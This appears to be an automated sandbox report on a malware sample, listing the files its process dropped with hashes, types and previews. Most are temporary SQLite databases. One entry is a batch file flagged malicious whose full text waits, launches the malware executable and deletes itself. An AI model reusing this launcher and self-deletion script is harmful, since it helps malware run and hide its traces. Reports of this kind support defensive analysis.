                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\T8eYMSKfZh

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TAkGKt6qmC

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TLsPLoPYV6

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\UEQ7F0w3PK

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\UFahZpjINZ

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\UJ59LdJnt9

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):5242880
                                                                                                                                                                        Entropy (8bit):0.037963276276857943
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                        MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                        SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                        SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                        SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\URLvRTOy0E

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\UV4iXMFwPx.bat

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):160
                                                                                                                                                                        Entropy (8bit):5.369230066114363
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mV8H1QLNSBktKcKZG1t+kiE2J5xAIgmK:hCRLuVFOOr+DEYesKOZG1wkn23fE
                                                                                                                                                                        MD5:E0D637F8AF09F33F1D5948B4C8A5F538
                                                                                                                                                                        SHA1:085BD3A2851AFF19EE5458A9ACB2438B2074737C
                                                                                                                                                                        SHA-256:7170FAA3EDFDBC5C128CDDDB625CF8DCA3A98BF2B32CF301E6506CFA18A9F9E7
                                                                                                                                                                        SHA-512:56D45FC21545634BE23554A2D9C2ECB9E8414969919F72D4071A0E5C11ADFB1F8B240CA89DF1EA9234DC511FBFF7C498D8A929C456A016780C892A17831014C3
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Windows\TAPI\ZWgKQlTqcrSB.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\UV4iXMFwPx.bat"

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\V4iKUbYTfq

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\VAZYEy4ATm

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\VBSedHormb

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\VXK0X3INTG

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\VcGfTunSmk

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\W1Yn60L5Nv

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\WAOW92WiBP

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Wi2PNOjNhv

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\XsLHRYlmRG

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\YEIbfqFfLW

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\YHhCq2mFtQ

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):98304
                                                                                                                                                                        Entropy (8bit):0.08235737944063153
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Yt2LB66JNF

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
